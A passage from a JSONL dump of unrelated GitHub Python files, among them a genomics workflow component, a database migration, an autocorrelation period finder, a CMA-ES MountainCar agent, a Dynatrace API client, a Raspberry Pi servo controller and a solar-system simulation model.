targets_name:\n prefixes.append(curr_aln + \"_\" + curr_name)\n return prefixes\n\n\n def get_targets_name(self):\n names = list()\n with BEDIO(self.targets) as FH_in:\n for curr_area in FH_in:\n names.append(curr_area.name)\n uniq_names = set([elt for elt in names if elt is not None])\n if len(names) != len(uniq_names):\n raise Exception('With option \"split_targets\" all the regions in {} must have an uniq name.'.format(self.targets))\n return names\n\n\n def process_split_targets(self):\n with BEDIO(self.targets) as FH_in:\n for curr_area in FH_in:\n curr_out = os.path.join(self.output_directory, curr_area.name.replace(\" \", \"_\") + \".bed\")\n nb_col = 4 if curr_area.thickStart is None or curr_area.thickEnd is None else 8 # 8 for amplicons with ZOI\n with BEDIO(curr_out, \"w\", write_nb_col=nb_col) as FH_out:\n FH_out.write(curr_area)\n\n\n def get_splitted_pathes(self):\n splitted_pathes = list()\n with BEDIO(self.targets) as FH_in:\n for curr_area in FH_in:\n curr_path = os.path.join(self.output_directory, curr_area.name.replace(\" \", \"_\") + \".bed\")\n splitted_pathes.append(curr_path)\n return splitted_pathes\n\n\n def process(self):\n if self.split_targets:\n self.process_split_targets()\n # Exec command\n cmd = self.get_exec_path(\"bamAreasToFastq.py\") + \\\n \" --min-overlap \" + str(self.min_overlap) + \\\n \" 
--input-targets $4\" + \\\n \" --input-aln $5\" + \\\n (\"\" if len(self.R1) == 0 else \" --input-R1 $6\") + \\\n (\"\" if len(self.R2) == 0 else \" --input-R2 $7\") + \\\n \" --output-R1 $1\" + \\\n \" --output-R2 $2\" + \\\n \" 2> $3\"\n bam2fastq_fct = ShellFunction(cmd, cmd_format='{EXE} {OUT} {IN}')\n inputs = [\n self.repeated_targets,\n (self.repeated_aln if self.split_targets else self.aln)\n ]\n if len(self.R1) > 0 and len(self.R2) > 0:\n inputs.extend([\n (self.repeated_R1 if self.split_targets else self.R1),\n (self.repeated_R2 if self.split_targets else self.R2)\n ])\n MultiMap(\n bam2fastq_fct,\n inputs=inputs,\n outputs=[self.out_R1, self.out_R2, self.stderr],\n )\n","repo_name":"bialimed/miams","sub_path":"jflow/workflows/components/bamAreasToFastq.py","file_name":"bamAreasToFastq.py","file_ext":"py","file_size_in_byte":6302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"70389943643","text":"\"\"\"empty message\n\nRevision ID: bf3b526df736\nRevises: 54c5e3f77877\nCreate Date: 2019-10-27 16:32:16.882966\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'bf3b526df736'\ndown_revision = '54c5e3f77877'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('sanjiang',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('bookname', sa.String(length=140), nullable=True),\n sa.Column('href', sa.String(length=140), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('sanjiang')\n # ### end Alembic commands ###\n","repo_name":"bopopescu/my_anlewo","sub_path":"migrations/versions/bf3b526df736_.py","file_name":"bf3b526df736_.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"9761213310","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\npath = './full_breast/'\nmask_path = path + 'mask/'\nprediction_path = path + 'pred/'\n\nfilenames = os.listdir(mask_path)\n\nfor img in filenames:\n\n mask = plt.imread(mask_path + img)\n prediction = plt.imread(prediction_path + img)\n\n #DEBUG\n print(mask.shape)\n print(prediction.shape)\n print('=================================')\n\ndef IOU(mask, prediction):\n mask_area = np.count_nonzero(mask == 1)\n prediction_area = np.count_nonzero(prediction == 1)\n\n intersection = np.count_nonzero(np.logical_and(mask, prediction))\n\n IoU = intersection / (mask_area + prediction_area - intersection)\n\n return IoU","repo_name":"Pooryamn/Breast-Tumor-Segmentation-and-Shape-Classification-in-Mammograms","sub_path":"SourceCodes/utils/Calculate_IOU.py","file_name":"Calculate_IOU.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"5258196406","text":"class Solution(object):\n def super_pow(self, a, b):\n if 1 == a:\n return 1\n n = int(''.join(map(str, b)))\n a %= 1337\n return self.get_power(a, n)\n\n def get_power(self, a, n):\n if 1 == n:\n return a % 1337\n m = n // 2\n ans_ = self.get_power(a, m)\n ans = ans_ * ans_\n if 1 == n % 2:\n ans *= a\n return ans % 
1337\n","repo_name":"nkukarl/leetcode","sub_path":"super_pow.py","file_name":"super_pow.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"19180121876","text":"from __future__ import print_function\nimport numpy as np\nimport glob\n\n\ndef simple_acf(x, y):\n \"\"\"\n Calculate ACF of y.\n Returns period, acf_smooth, lags, rvar\n \"\"\"\n\n # interpolate across gaps\n gap_days = 0.02043365\n time = np.arange(x[0], x[-1], gap_days)\n lin_interp = np.interp(time, x, y)\n x, y = time, lin_interp\n\n # fit and subtract straight line\n AT = np.vstack((x, np.ones_like(x)))\n ATA = np.dot(AT, AT.T)\n m, b = np.linalg.solve(ATA, np.dot(AT, y))\n y -= m*x + b\n\n # perform acf\n acf = dan_acf(y)\n\n # create 'lags' array\n lags = np.arange(len(acf))*gap_days\n\n N = len(acf)\n double_acf, double_lags = [np.zeros((2*N)) for i in range(2)]\n double_acf[:N], double_lags[:N] = acf[::-1], -lags[::-1]\n double_acf[N:], double_lags[N:] = acf, lags\n acf, lags = double_acf, double_lags\n\n # smooth with Gaussian kernel convolution\n Gaussian = lambda x, sig: 1./(2*np.pi*sig**.5) * np.exp(-0.5*(x**2)/\n (sig**2))\n conv_func = Gaussian(np.arange(-28, 28, 1.), 9.)\n acf_smooth = np.convolve(acf, conv_func, mode='same')\n\n # just use the second bit (no reflection)\n acf_smooth, lags = acf_smooth[N:], lags[N:]\n\n # cut it in half (and reduce to 100 days)\n m = lags < max(lags)/2.\n m = (lags < max(lags)/2.) * (lags < 100)\n acf_smooth, lags = acf_smooth[m], lags[m]\n\n # ditch the first point\n acf_smooth, lags = acf_smooth[1:], lags[1:]\n\n # # fit and subtract straight line\n # AT = np.vstack((lags, np.ones_like(lags)))\n # ATA = np.dot(AT, AT.T)\n # m, b = np.linalg.solve(ATA, np.dot(AT, acf_smooth))\n # acf_smooth -= m*lags + b\n\n # Cut off the first half a day\n m = lags > .5\n acf_smooth, lags = acf_smooth[m], lags[m]\n\n # find all the peaks\n peaks = np.array([i for i in range(1, len(lags)-1)\n if acf_smooth[i-1] < acf_smooth[i] and\n acf_smooth[i+1] < acf_smooth[i]])\n\n # find the first and second peaks\n if len(peaks) > 1:\n if acf_smooth[peaks[0]] > acf_smooth[peaks[1]]:\n period = lags[peaks[0]]\n else:\n period = lags[peaks[1]]\n elif len(peaks) == 1:\n period = lags[peaks][0]\n elif not len(peaks):\n period = np.nan\n\n # find the highest peak\n if len(peaks):\n m = acf_smooth == max(acf_smooth[peaks])\n highest_peak = acf_smooth[m][0]\n period = lags[m][0]\n print(period)\n else:\n period = 0.\n\n rvar = np.percentile(y, 95)\n\n return period, acf_smooth, lags, rvar\n\n\ndef find_nearest(array, value):\n idx = (np.abs(array-value)).argmin()\n return array[idx]\n\n\n# dan's acf function\ndef dan_acf(x, axis=0, fast=False):\n \"\"\"\n Estimate the autocorrelation function of a time series using the FFT.\n :param x:\n The time series. If multidimensional, set the time axis using the\n ``axis`` keyword argument and the function will be computed for every\n other axis.\n :param axis: (optional)\n The time axis of ``x``. 
Assumed to be the first axis if not specified.\n    :param fast: (optional)\n        If ``True``, only use the largest ``2^n`` entries for efficiency.\n        (default: False)\n    \"\"\"\n    x = np.atleast_1d(x)\n    m = [slice(None), ] * len(x.shape)\n\n    # For computational efficiency, crop the chain to the largest power of\n    # two if requested.\n    if fast:\n        n = int(2**np.floor(np.log2(x.shape[axis])))\n        m[axis] = slice(0, n)\n        x = x[m]\n    else:\n        n = x.shape[axis]\n\n    # Compute the FFT and then (from that) the auto-correlation function.\n    f = np.fft.fft(x-np.mean(x, axis=axis), n=2*n, axis=axis)\n    m[axis] = slice(0, n)\n    acf = np.fft.ifft(f * np.conjugate(f), axis=axis)[m].real\n    m[axis] = 0\n    return acf / acf[m]\n\n\nif __name__ == \"__main__\":\n\n    DIR = \".\"  # edit me!\n    fnames = glob.glob(\"%s/*.dat\" % DIR)\n\n    for i, fname in enumerate(fnames[1:]):\n        id = fname.split(\"/\")[-1].split(\"_\")[0]  # edit me!\n        x, y, _, _ = np.genfromtxt(fname, skip_header=1).T\n        yerr = np.ones_like(y) * 1e-5  # FIXME\n\n        period, acf, lags, rvar = simple_acf(x, y)\n        make_plot(acf, lags, id)\n","repo_name":"RuthAngus/GProtation","sub_path":"gprotation/simple_acf.py","file_name":"simple_acf.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"86"} +{"seq_id":"16761569892","text":"'''\nNouredine Nour (LaChancla on codalab)\nTP4 Direct Policy Search\n'''\n\nimport numpy as np\nfrom environment import Environment\nimport cma\n\"\"\"\nContains the definition of the agent that will run in an\nenvironment.\n\"\"\"\n\nclass Patrick:\n\n    def __init__(self):\n        \"\"\"\n        Init a new agent.\n        \"\"\"\n\n        # Discretizing position and velocity :\n        self.positions = np.linspace(start=-1.2, stop=0.6, num=6)\n        self.velocities = np.linspace(start=-0.07, stop=0.07, num=20)\n\n        # Here we initialize the policy with a previous solution\n        self.policy = np.array([list([1., 0., 2., 2., 0., 2., 2., 2., 0., 2., 1., 1., 0., 2., 1., 1., 0.,\n       1., 2., 2.]), list([2., 2., 2., 1., 2., 0., 1., 0., 0., 0., 2., 2., 1., 2., 2., 2., 1.,\n       0., 2., 1.]), list([0., 2., 2., 0., 0., 0., 0., 1., 1., 2., 2., 2., 2., 1., 2., 0., 2.,\n       0., 1., 2.]), list([0., 2., 0., 2., 1., 0., 0., 0., 1., 0., 1., 2., 2., 2., 2., 2., 2.,\n       2., 0., 0.]), list([1., 2., 1., 1., 0., 2., 2., 2., 0., 2., 2., 0., 2., 2., 2., 2., 2.,\n       2., 1., 1.]), list([0., 0., 2., 0., 0., 2., 2., 2., 2., 0., 2., 1., 0., 0., 0., 2., 1.,\n       0., 1., 2.])])\n        # We can start from scratch by uncommenting the following line:\n        # self.policy = np.zeros(shape=(self.positions.shape[0], self.velocities.shape[0]))\n        # We define the initial solution for our cma-es\n        self.init = self.policy.reshape(self.positions.shape[0]*self.velocities.shape[0])\n        self.b_policy = None\n        self.train() # Do not remove this line!!\n\n\n    def train(self):\n\n        \"\"\"\n        Learn your (final) policy.\n\n        Use evolution strategy algorithm CMA-ES: https://pypi.org/project/cma/\n\n        Possible action: [0, 1, 2]\n        Range observation (tuple):\n            - position: [-1.2, 0.6]\n            - velocity: [-0.07, 0.07]\n        \"\"\"\n        def policy_action(position, velocity, policy):\n            '''Function that returns the action given a state and a policy'''\n            i_position, i_velocity = get_discretized_env(position, velocity)\n            # print(i_position, i_velocity)\n            action = policy[i_position][i_velocity]\n            return action\n\n        def get_discretized_env(position, velocity, velocities=self.velocities, positions=self.positions):\n            '''Function that gives the indices to look for in the discretized position and velocity space'''\n            i = 0\n            while 
velocity > velocities[i]:\n                i += 1\n            velocity_index = i\n            j = 0\n            while position > positions[j]:\n                j += 1\n            position_index = j\n            return position_index, velocity_index\n\n        env = Environment()\n\n        # For debug purposes\n        self.min_value = 999999999\n\n        def obj_function(policy):\n            ''' Function that takes a policy and runs it on 200 steps of the environment. It returns the fitness of the policy.\n            '''\n            env.reset()\n            iter_counter = 0\n            x = policy.reshape(self.positions.shape[0]*self.velocities.shape[0], -1)\n            x = np.floor(x)\n            d_policy = x.reshape(self.positions.shape[0], self.velocities.shape[0])\n\n            distances = []\n            distance_mid = []\n            energy = []\n            malus = 200\n\n            for i in range(200):\n                # env.render()\n                # We take an action according to the given policy\n                position, velocity = env.state\n                distances.append(np.absolute(0.6 - position))\n                distance_mid.append(np.absolute(-0.56 - position))\n                energy.append(0.5*(velocity**2))\n                if position == 0.6:\n                    # If we enter here we won the game\n                    malus = (i / 200) * 200\n                    value = -sum(distance_mid) -max(energy) + malus + min(distances)*50 - (np.absolute(min(distances) - max(distances))*100)\n\n                    # For debug purposes :\n                    if value < self.min_value:\n                        self.min_value = value\n                        print('New best value = '+str(self.min_value))\n                    return value\n                action = policy_action(position, velocity, d_policy)\n                _, _ = env.act(int(np.floor(action)))\n\n            value = -sum(distance_mid)-max(energy) + malus + min(distances)*50 -(np.absolute(min(distances) - max(distances))*100)\n            # For debug purposes :\n            if value < self.min_value:\n                self.min_value = value\n                print('New best value = '+str(self.min_value))\n            return value\n\n        # We launch a cma-es to find a policy that minimizes the objective function value\n        # We decided to fix the ftarget value so it doesn't take too long to run but we could remove it\n        # to optimize the function even more\n        best_policy, _ = cma.fmin2(obj_function, self.init, 2,{\n            #'BoundaryHandler': 'BoundPenalty',\n            'BoundaryHandler': 'BoundTransform',\n            'bounds':[0,3],\n            'verbose':1,\n            'ftarget':-100,\n            'seed': 237591\n        })\n        print(\"Optimization FINISHED\")\n        #self.policy = best_policy\n        self.b_policy = best_policy\n        self.policy = np.floor(best_policy).reshape(self.positions.shape[0], self.velocities.shape[0])\n        print(\"Best Policy updated\"+str(self.policy))\n\n    def act(self, observation):\n        \"\"\"\n        Acts given an observation of the environment (using learned policy).\n\n        Takes as argument an observation of the current state, and\n        returns the chosen action.\n        See environment documentation: https://github.com/openai/gym/wiki/MountainCar-v0\n        Possible action: [0, 1, 2]\n        Range observation (tuple):\n            - position: [-1.2, 0.6]\n            - velocity: [-0.07, 0.07]\n        \"\"\"\n\n        def policy_action(position, velocity, policy):\n            i_position, i_velocity = get_discretized_env(position, velocity)\n            # print(i_position, i_velocity)\n\n            action = policy[i_position][i_velocity]\n            # print(\"Velocity : %f\"%velocity)\n            # print(\"Next Action %d, %d ----> %d\"%(i_position, i_velocity, action))\n            return action\n\n        def get_discretized_env(position, velocity, velocities=self.velocities, positions=self.positions):\n            i = 0\n            while velocity > velocities[i]:\n                i += 1\n            velocity_index = i\n            j = 0\n            while position > positions[j]:\n                j += 1\n            position_index = j\n            return position_index, velocity_index\n\n        # Once the training is finished we simply follow the best policy cma could find\n        x = self.b_policy.reshape(self.positions.shape[0]*self.velocities.shape[0], -1)\n        x = np.floor(x)\n        d_policy = 
x.reshape(self.positions.shape[0], self.velocities.shape[0])\n\n action = policy_action(observation[0], observation[1], d_policy)\n action = (int(np.floor(action)))\n\n return action\n\nAgent = Patrick\n","repo_name":"Nchlt/MountainCar","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":7257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71239484446","text":"import json\nimport logging\n\nimport requests\n\ndefault_logger = logging.getLogger(__name__)\n\n\nclass DynatraceAPI:\n def __init__(self, url: str, token: str, logger=default_logger):\n self.base_url = url\n self._auth = {\"Authorization\": f\"Api-Token {token}\"}\n self.logger = logger\n\n def _make_request(self, path, params=None, method=\"GET\"):\n url = f\"{self.base_url}{path}\"\n self.logger.debug(f\"Calling {url} with params: {params}\")\n if method == \"GET\":\n r = requests.request(method, url, params=params, headers=self._auth)\n else:\n r = requests.request(method, url, json=params, headers=self._auth)\n self.logger.debug(f\"Got response: {r} from {url}\")\n if r.status_code >= 300:\n self.logger.error(f\"Error making request: {r.text}\")\n return r.json()\n\n def metrics_descriptors(self):\n path = \"/api/v2/metrics/descriptors\"\n return self._make_request(path)\n\n def metrics_series(\n self, selector, resolution=None, date_from=None, date_to=None, next_page_key=None, page_size=None, scope=None, entitySelector=None\n ):\n path = f\"/api/v2/metrics/query\"\n params = {\n \"metricSelector\": selector,\n \"resolution\": resolution,\n \"from\": date_from,\n \"to\": date_to,\n \"nextPageKey\": next_page_key,\n \"pageSize\": page_size,\n \"scope\": scope,\n \"entitySelector\": entitySelector\n }\n self.logger.debug(f\"Calling {path} with params {params}\")\n return self._make_request(path, params=params)\n\n def synthetic_monitors(self):\n path = \"/api/v1/synthetic/monitors\"\n return self._make_request(path)\n\n def synthetic_monitor(self, monitor_id):\n path = f\"/api/v1/synthetic/monitors/{monitor_id}\"\n return self._make_request(path)\n\n def timeseries(\n self,\n identifier,\n include_data: bool = False,\n aggregation=None,\n start_timestamp=None,\n end_timestamp=None,\n predict=False,\n relative_time=None,\n query_mode=\"SERIES\",\n entities=None,\n tag=None,\n percentile=None,\n include_parents_ids=False,\n consider_maintenance=False,\n ):\n path = f\"/api/v1/timeseries/{identifier}\"\n params = {\n \"includeData\": include_data,\n \"aggregationType\": aggregation,\n \"startTimestamp\": start_timestamp,\n \"endTimestamp\": end_timestamp,\n \"predict\": predict,\n \"relativeTime\": relative_time,\n \"queryMode\": query_mode,\n \"entities\": entities,\n \"tag\": tag,\n \"percentile\": percentile,\n \"includeParentIds\": include_parents_ids,\n \"considerMaintenanceWindowsForAvailability\": consider_maintenance,\n }\n return self._make_request(path, params, method=\"POST\")\n\n\ndef main():\n\n with open(\"config.json\", \"r\") as f:\n config = json.load(f)\n d = DynatraceAPI(config[\"dynatrace_base_url\"], config[\"dynatrace_token\"])\n\n from pprint import pformat\n\n # print(pformat(d.synthetic_monitor(\"HTTP_CHECK-4A8FA7A3BD1C6C64\"), indent=2))\n\n for metric, details in d.metrics_series(\"builtin:synthetic.browser.event.failure:names\", date_from=\"now-5m\")[\n \"metrics\"\n ].items():\n for serie in details[\"series\"]:\n print(serie)\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"dlopes7/dynatrace-csv-wrapper","sub_path":"classicwrapper/dynatrace_api.py","file_name":"dynatrace_api.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"33881622864","text":"\ntry:\n import RPIO\n RPIO_IS_PRESENT = True\nexcept ImportError:\n print('RPIO not installed. Will simulate behavior.')\n RPIO_IS_PRESENT = False\n\nfrom configuration import SERVO\nimport threading\nimport time\n\ncurrent_servo_position = None\n\nif RPIO_IS_PRESENT:\n servo = None\n def init_servo():\n global servo\n if servo is not None:\n return\n import signal\n\n # PWM traps all signals\n # see https://github.com/metachris/RPIO/issues/15\n # save the signals\n saved_signals = {}\n for s in dir(signal):\n if s.startswith('SIG') and not s.startswith('SIG_'):\n si = getattr(signal, s)\n saved_signals[si] = signal.getsignal(si)\n from RPIO import PWM\n # http://pythonhosted.org/RPIO/pwm_py.html\n servo = PWM.Servo()\n # restore the signals\n for si, h in saved_signals.items():\n if si in (9, 19):\n continue\n signal.signal(si, h)\n\n servo_lock = threading.Lock()\n\n def _set_servo_position(degrees):\n global current_servo_position\n if current_servo_position == degrees:\n return\n init_servo()\n # compute pulse width\n degrees = degrees % 360\n if degrees > SERVO.ROTATIONAL_RANGE:\n degrees = SERVO.ROTATIONAL_RANGE\n pulse_width = SERVO.PULSE_WIDTH_MIN + \\\n (SERVO.PULSE_WIDTH_MAX - SERVO.PULSE_WIDTH_MIN) * degrees \\\n / SERVO.ROTATIONAL_RANGE\n\n # pulse the servo\n with servo_lock:\n servo.set_servo(SERVO.PIN, int(pulse_width * 100000) * 10)\n current_servo_position = degrees\n\nelse:\n def _set_servo_position(degrees):\n global current_servo_position\n print('set servo position to {}°.'.format(int(degrees)))\n current_servo_position = degrees\n\nwanted_servo_position = None\n\ndef set_servo_position(degrees):\n global wanted_servo_position\n wanted_servo_position = degrees\n return time_to_arrive()\n\ndef time_to_arrive():\n if current_servo_position is None or wanted_servo_position is None:\n return SERVO.ROTATIONAL_RANGE * \\\n SERVO.MOVEMENT_SPEED_IN_SECONDS_PER_DEGREES * \\\n servo_velocity_multiplier\n return abs(wanted_servo_position - current_servo_position) * \\\n SERVO.MOVEMENT_SPEED_IN_SECONDS_PER_DEGREES * \\\n servo_velocity_multiplier\n\ndef set_servo_to_middle():\n set_servo_position(SERVO.ROTATIONAL_RANGE / 2)\n\nservo_velocity_multiplier = SERVO.DEFAULT_VELOCITY_MULTIPLIER\n\ndef set_servo_velocity(velocity_multiplier):\n global servo_velocity_multiplier\n velocity_multiplier = float(velocity_multiplier)\n if velocity_multiplier < SERVO.MINIMUM_VELOCITY_MULTIPLIER:\n velocity_multiplier = SERVO.MINIMUM_VELOCITY_MULTIPLIER\n elif velocity_multiplier > SERVO.MAXIMUM_VELOCITY_MULTIPLIER:\n velocity_multiplier = SERVO.MAXIMUM_VELOCITY_MULTIPLIER\n servo_velocity_multiplier = velocity_multiplier\n return servo_velocity_multiplier\n\nIDLE_SLEEP_TIME = 0.01\n\ndef servo_move_loop():\n while 1:\n # wait for servo to arrive\n time.sleep(SERVO.REACTION_TIME_FOR_NEW_POSITION_IN_SECONDS)\n # test if the parameters are valid\n if wanted_servo_position is None:\n continue\n if current_servo_position is None:\n _set_servo_position(wanted_servo_position)\n continue\n # conpute the the step size in degrees\n # for the movement within the reaction time\n step_size = SERVO.REACTION_TIME_FOR_NEW_POSITION_IN_SECONDS / \\\n SERVO.MOVEMENT_SPEED_IN_SECONDS_PER_DEGREES / \\\n 
servo_velocity_multiplier\n if wanted_servo_position < current_servo_position - step_size:\n step = -step_size\n elif wanted_servo_position > current_servo_position + step_size:\n step = step_size\n else:\n step = wanted_servo_position - current_servo_position\n _set_servo_position(current_servo_position + step)\n\n__all__ = ['set_servo_position', 'set_servo_to_middle', 'RPIO_IS_PRESENT', \\\n 'set_servo_velocity', 'servo_move_loop']\n","repo_name":"niccokunzmann/rustyrobots","sub_path":"roedel/raspberrypi/robot/servo_control.py","file_name":"servo_control.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15689397768","text":"from scipy.spatial.distance import cdist\r\nimport numpy as np\r\n\r\n\r\ndef geometrical_separability_index(matrix, labels):\r\n size = len(labels)\r\n distances = cdist(matrix, matrix)\r\n positions = distances.argsort(axis=0)\r\n elements = np.take(labels, positions)\r\n reference_points = elements[0]\r\n nearest_neighbours = elements[1]\r\n gsi = np.sum(reference_points == nearest_neighbours) / size\r\n return gsi\r\n","repo_name":"aacevedot/gsindex","sub_path":"src/gsindex.py","file_name":"gsindex.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"86"} +{"seq_id":"12700267078","text":"import math\nimport random\n\nfrom constants import \\\n Color, OrbitTime, Radius, OrbitalRadius, BodyName, CelestialBodyType\nfrom utils import \\\n km_to_pixels, au_to_pixels, get_sun_scale_radius, get_planet_scale_radius\n\n\nclass CelestialBody(object):\n\n def __init__(self):\n self.type = CelestialBodyType.CELESTIAL_BODY\n\n # Draw values\n self.x = 0\n self.y = 0\n self.color = (0, 0, 0)\n self.preselected = False\n self.visible = True\n\n # Data values\n self.radius = 0\n self.name = \"\"\n\n\nclass Star(CelestialBody):\n\n def __init__(self):\n CelestialBody.__init__(self)\n\n self.type = CelestialBodyType.STAR\n self.planets = []\n\n\nclass OrbitCelestialBody(CelestialBody):\n\n def __init__(self, around_the=None):\n CelestialBody.__init__(self)\n\n self.angle = random.randint(0, 359)\n self.orbit_time = 0\n self.orbital_radius = 0\n self.around_the = around_the\n\n def calculate_position(self, width, height, zoom):\n pass\n\n def advance(self, speed):\n self.angle += 360.0 / self.orbit_time * speed\n\n if self.angle >= 360:\n self.angle -= 360\n\n\nclass NaturalSatellite(OrbitCelestialBody):\n\n def __init__(self, planet=None):\n OrbitCelestialBody.__init__(self, around_the=planet)\n\n self.type = CelestialBodyType.NATURAL_SATELLITE\n\n def calculate_position(self, width, height, zoom):\n radius = km_to_pixels(width, height, self.radius, zoom)\n distance = au_to_pixels(\n width, height, self.orbital_radius, zoom)\n distance += get_planet_scale_radius(\n width, height, self.around_the, zoom)\n distance += radius * 2 + zoom\n self.x = distance * math.sin(self.angle * math.pi / 180.0)\n self.y = distance * math.cos(self.angle * math.pi / 180.0)\n\n\nclass Planet(OrbitCelestialBody):\n\n def __init__(self, star=None):\n OrbitCelestialBody.__init__(self, around_the=star)\n\n self.type = CelestialBodyType.PLANET\n self.natural_satellites = []\n\n def calculate_position(self, width, height, zoom):\n radius = km_to_pixels(width, height, self.radius, zoom)\n distance = au_to_pixels(\n width, height, self.orbital_radius, zoom)\n distance += get_sun_scale_radius(\n width, height, zoom) + 
radius\n self.x = distance * math.sin(self.angle * math.pi / 180.0)\n self.y = distance * math.cos(self.angle * math.pi / 180.0)\n\n\nclass Moon(NaturalSatellite):\n\n def __init__(self, earth=None):\n NaturalSatellite.__init__(self, planet=earth)\n\n self.type = CelestialBodyType.MOON\n self.color = Color.MOON\n self.orbit_time = OrbitTime.MOON\n self.radius = Radius.MOON\n self.orbital_radius = OrbitalRadius.MOON\n self.name = BodyName.MOON\n\n\nclass Fobos(NaturalSatellite):\n\n def __init__(self, mars=None):\n NaturalSatellite.__init__(self, planet=mars)\n\n self.type = CelestialBodyType.FOBOS\n self.color = Color.FOBOS\n self.orbit_time = OrbitTime.FOBOS\n self.radius = Radius.FOBOS\n self.orbital_radius = OrbitalRadius.FOBOS\n self.name = BodyName.FOBOS\n\n\nclass Deimos(NaturalSatellite):\n\n def __init__(self, mars=None):\n NaturalSatellite.__init__(self, planet=mars)\n\n self.type = CelestialBodyType.DEIMOS\n self.color = Color.DEIMOS\n self.orbit_time = OrbitTime.DEIMOS\n self.radius = Radius.DEIMOS\n self.orbital_radius = OrbitalRadius.DEIMOS\n self.name = BodyName.DEIMOS\n\n\nclass Io(NaturalSatellite):\n\n def __init__(self, jupiter=None):\n NaturalSatellite.__init__(self, planet=jupiter)\n\n self.type = CelestialBodyType.IO\n self.color = Color.IO\n self.orbit_time = OrbitTime.IO\n self.radius = Radius.IO\n self.orbital_radius = OrbitalRadius.IO\n self.name = BodyName.IO\n\n\nclass Europa(NaturalSatellite):\n\n def __init__(self, jupiter=None):\n NaturalSatellite.__init__(self, planet=jupiter)\n\n self.type = CelestialBodyType.EUROPA\n self.color = Color.EUROPA\n self.orbit_time = OrbitTime.EUROPA\n self.radius = Radius.EUROPA\n self.orbital_radius = OrbitalRadius.EUROPA\n self.name = BodyName.EUROPA\n\n\nclass Ganymede(NaturalSatellite):\n\n def __init__(self, jupiter=None):\n NaturalSatellite.__init__(self, planet=jupiter)\n\n self.type = CelestialBodyType.GANYMEDE\n self.color = Color.GANYMEDE\n self.orbit_time = OrbitTime.GANYMEDE\n self.radius = Radius.GANYMEDE\n self.orbital_radius = OrbitalRadius.GANYMEDE\n self.name = BodyName.GANYMEDE\n\n\nclass Callisto(NaturalSatellite):\n\n def __init__(self, jupiter=None):\n NaturalSatellite.__init__(self, planet=jupiter)\n\n self.type = CelestialBodyType.CALLISTO\n self.color = Color.CALLISTO\n self.orbit_time = OrbitTime.CALLISTO\n self.radius = Radius.CALLISTO\n self.orbital_radius = OrbitalRadius.CALLISTO\n self.name = BodyName.CALLISTO\n\n\nclass Mercury(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.MERCURY\n self.color = Color.MERCURY\n self.orbit_time = OrbitTime.MERCURY\n self.radius = Radius.MERCURY\n self.orbital_radius = OrbitalRadius.MERCURY\n self.name = BodyName.MERCURY\n\n\nclass Venus(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.VENUS\n self.color = Color.VENUS\n self.orbit_time = OrbitTime.VENUS\n self.radius = Radius.VENUS\n self.orbital_radius = OrbitalRadius.VENUS\n self.name = BodyName.VENUS\n\n\nclass Earth(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.EARTH\n self.color = Color.EARTH\n self.orbit_time = OrbitTime.EARTH\n self.radius = Radius.EARTH\n self.orbital_radius = OrbitalRadius.EARTH\n self.natural_satellites = [Moon(self)]\n self.name = BodyName.EARTH\n\n\nclass Mars(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.MARS\n self.color = 
Color.MARS\n        self.orbit_time = OrbitTime.MARS\n        self.radius = Radius.MARS\n        self.orbital_radius = OrbitalRadius.MARS\n        self.natural_satellites = [Fobos(self), Deimos(self)]\n        self.name = BodyName.MARS\n\n\nclass Jupiter(Planet):\n\n    def __init__(self, sun=None):\n        Planet.__init__(self, star=sun)\n\n        self.type = CelestialBodyType.JUPITER\n        self.color = Color.JUPITER\n        self.orbit_time = OrbitTime.JUPITER\n        self.radius = Radius.JUPITER\n        self.orbital_radius = OrbitalRadius.JUPITER\n        self.natural_satellites = [\n            Io(self), Europa(self), Ganymede(self), Callisto(self)]\n        self.name = BodyName.JUPITER\n\n\nclass Saturn(Planet):\n\n    def __init__(self, sun=None):\n        Planet.__init__(self, star=sun)\n\n        self.type = CelestialBodyType.SATURN\n        self.color = Color.SATURN\n        self.orbit_time = OrbitTime.SATURN\n        self.radius = Radius.SATURN\n        self.orbital_radius = OrbitalRadius.SATURN\n        self.name = BodyName.SATURN\n\n\nclass Uranus(Planet):\n\n    def __init__(self, sun=None):\n        Planet.__init__(self, star=sun)\n\n        self.type = CelestialBodyType.URANUS\n        self.color = Color.URANUS\n        self.orbit_time = OrbitTime.URANUS\n        self.radius = Radius.URANUS\n        self.orbital_radius = 